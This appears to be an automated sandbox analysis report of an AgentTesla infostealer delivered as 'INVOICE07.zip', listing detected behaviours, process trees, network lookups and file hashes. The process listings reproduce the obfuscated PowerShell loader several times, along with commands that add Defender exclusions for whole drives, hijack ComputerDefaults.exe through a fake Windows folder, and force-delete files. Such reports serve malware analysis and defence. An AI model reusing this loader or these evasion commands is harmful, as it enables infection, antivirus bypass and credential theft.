Analysis Overview
SHA256
900686f955496fc4db8bd11b35a3b531e2ff9987d8c39349a8d6116029d3e5fd
Threat Level: Known bad
The file INVOICE07.zip was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Executes dropped EXE
Loads dropped DLL
Looks up external IP address via web service
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-03 06:09
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-03 06:09
Reported
2024-06-03 06:11
Platform
win7-20240419-en
Max time kernel
119s
Max time network
123s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1876 wrote to memory of 2404 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1876 wrote to memory of 2404 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1876 wrote to memory of 2404 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1876 wrote to memory of 2388 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1876 wrote to memory of 2388 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1876 wrote to memory of 2388 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1876 wrote to memory of 2924 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1876 wrote to memory of 2924 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1876 wrote to memory of 2924 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\INVOICE07.bat"
C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YFEk7bCybDCwVf0wTlX8N4pDcP2M+6VJEGXybuh+8wc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ppkRkLHGStauzXAtFwrtog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWVPe=New-Object System.IO.MemoryStream(,$param_var); $VqYlz=New-Object System.IO.MemoryStream; $hGmEI=New-Object System.IO.Compression.GZipStream($VWVPe, [IO.Compression.CompressionMode]::Decompress); $hGmEI.CopyTo($VqYlz); $hGmEI.Dispose(); $VWVPe.Dispose(); $VqYlz.Dispose(); $VqYlz.ToArray();}function execute_function($param_var,$param2_var){ $NuRNy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Lqnnw=$NuRNy.EntryPoint; $Lqnnw.Invoke($null, $param2_var);}$ITxqM = 'C:\Users\Admin\AppData\Local\Temp\INVOICE07.bat';$host.UI.RawUI.WindowTitle = $ITxqM;$NFyDa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ITxqM).Split([Environment]::NewLine);foreach ($RWjHW in $NFyDa) { if ($RWjHW.StartsWith('beDrwtSuNzbegooyjSZN')) { $bpNTb=$RWjHW.Substring(20); break; }}$payloads_var=[string[]]$bpNTb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
Network
Files
memory/2924-4-0x000007FEF5F2E000-0x000007FEF5F2F000-memory.dmp
memory/2924-5-0x000000001B5A0000-0x000000001B882000-memory.dmp
memory/2924-7-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp
memory/2924-6-0x0000000001DA0000-0x0000000001DA8000-memory.dmp
memory/2924-9-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp
memory/2924-8-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp
memory/2924-10-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp
memory/2924-11-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp
memory/2924-12-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp
memory/2924-13-0x000007FEF5F2E000-0x000007FEF5F2F000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-03 06:09
Reported
2024-06-03 06:11
Platform
win10v2004-20240508-en
Max time kernel
138s
Max time network
113s
Command Line
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows \System32\ComputerDefaults.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows \System32\ComputerDefaults.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\INVOICE07.bat"
C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YFEk7bCybDCwVf0wTlX8N4pDcP2M+6VJEGXybuh+8wc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ppkRkLHGStauzXAtFwrtog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWVPe=New-Object System.IO.MemoryStream(,$param_var); $VqYlz=New-Object System.IO.MemoryStream; $hGmEI=New-Object System.IO.Compression.GZipStream($VWVPe, [IO.Compression.CompressionMode]::Decompress); $hGmEI.CopyTo($VqYlz); $hGmEI.Dispose(); $VWVPe.Dispose(); $VqYlz.Dispose(); $VqYlz.ToArray();}function execute_function($param_var,$param2_var){ $NuRNy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Lqnnw=$NuRNy.EntryPoint; $Lqnnw.Invoke($null, $param2_var);}$ITxqM = 'C:\Users\Admin\AppData\Local\Temp\INVOICE07.bat';$host.UI.RawUI.WindowTitle = $ITxqM;$NFyDa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ITxqM).Split([Environment]::NewLine);foreach ($RWjHW in $NFyDa) { if ($RWjHW.StartsWith('beDrwtSuNzbegooyjSZN')) { $bpNTb=$RWjHW.Substring(20); break; }}$payloads_var=[string[]]$bpNTb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
C:\Windows \System32\ComputerDefaults.exe
"C:\Windows \System32\ComputerDefaults.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c call SC.cmd
C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YFEk7bCybDCwVf0wTlX8N4pDcP2M+6VJEGXybuh+8wc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ppkRkLHGStauzXAtFwrtog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWVPe=New-Object System.IO.MemoryStream(,$param_var); $VqYlz=New-Object System.IO.MemoryStream; $hGmEI=New-Object System.IO.Compression.GZipStream($VWVPe, [IO.Compression.CompressionMode]::Decompress); $hGmEI.CopyTo($VqYlz); $hGmEI.Dispose(); $VWVPe.Dispose(); $VqYlz.Dispose(); $VqYlz.ToArray();}function execute_function($param_var,$param2_var){ $NuRNy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Lqnnw=$NuRNy.EntryPoint; $Lqnnw.Invoke($null, $param2_var);}$ITxqM = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $ITxqM;$NFyDa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ITxqM).Split([Environment]::NewLine);foreach ($RWjHW in $NFyDa) { if ($RWjHW.StartsWith('beDrwtSuNzbegooyjSZN')) { $bpNTb=$RWjHW.Substring(20); break; }}$payloads_var=[string[]]$bpNTb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
Files
memory/1520-0-0x00007FF917853000-0x00007FF917855000-memory.dmp
memory/1520-1-0x0000023038450000-0x0000023038472000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x0ymyjgn.fzo.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1520-11-0x00007FF917850000-0x00007FF918311000-memory.dmp
memory/1520-12-0x00007FF917850000-0x00007FF918311000-memory.dmp
memory/1520-13-0x0000023038710000-0x0000023038754000-memory.dmp
memory/1520-14-0x00000230389F0000-0x0000023038A66000-memory.dmp
memory/1520-15-0x00000230386E0000-0x00000230386F0000-memory.dmp
memory/1520-17-0x00007FF934E80000-0x00007FF934F3E000-memory.dmp
memory/1520-16-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmp
memory/1520-18-0x0000023038970000-0x00000230389D6000-memory.dmp
memory/1744-19-0x00007FF917850000-0x00007FF918311000-memory.dmp
memory/1744-20-0x00007FF917850000-0x00007FF918311000-memory.dmp
memory/1744-30-0x00007FF917850000-0x00007FF918311000-memory.dmp
memory/1744-33-0x00007FF917850000-0x00007FF918311000-memory.dmp
C:\Windows \System32\ComputerDefaults.exe
| MD5 | d25a9e160e3b74ef2242023726f15416 |
| SHA1 | 27a9bb9d7628d442f9b5cf47711c906e3315755b |
| SHA256 | 7b0334c329e40a542681bcaff610ae58ada8b1f77ff6477734c1b8b9a951ef4c |
| SHA512 | bafaee786c90c96a2f76d4bbcddbbf397a1afd82d55999081727900f3c2de8d2eba6b77d25c622de0c1e91c54259116bc37bc9f29471d1b387f78aaa4d276910 |
C:\Windows \System32\MLANG.dll
| MD5 | e286ada1af4b08fa4b7c78f862883c4e |
| SHA1 | 798ebc7b7cd3db667f1a59ade299be4cff397f39 |
| SHA256 | 16eb71b68025711fdbc93229fde22ecc73dc8a23be8b40700772b96978187ea3 |
| SHA512 | fbbbc893388a39e94d8b2265aef75dbaf5fd928fadabd3dbfc5cbee64b600de0102b82e5d2b5c56efe128b45f6ddd4bba2668194c05decdfa78c8e7e382de3f5 |
C:\Users\Admin\AppData\Local\Temp\SC.cmd
| MD5 | 1952a79579272db52a814baf57821f90 |
| SHA1 | 3fcfb6c3d2c08e840d758e905c2f304ec39ca9f3 |
| SHA256 | e575145995f725fbaecc1b95c73ec0fbdad3117e1f492dc8d93ad076f5ad2da1 |
| SHA512 | 088de9db26c4eda94bb71a5379118418c06bcb46d8ccce7d1da2719c8d742e8347a4dfde9f73afbb362ef461a0af159408d9150adc8653f6e5a3507408eb6a93 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/4512-55-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmp
memory/4512-56-0x00007FF934E80000-0x00007FF934F3E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
memory/4512-70-0x000001D0C16E0000-0x000001D0C1722000-memory.dmp
memory/1520-71-0x00007FF917850000-0x00007FF918311000-memory.dmp
memory/4512-72-0x000001D0C17C0000-0x000001D0C1810000-memory.dmp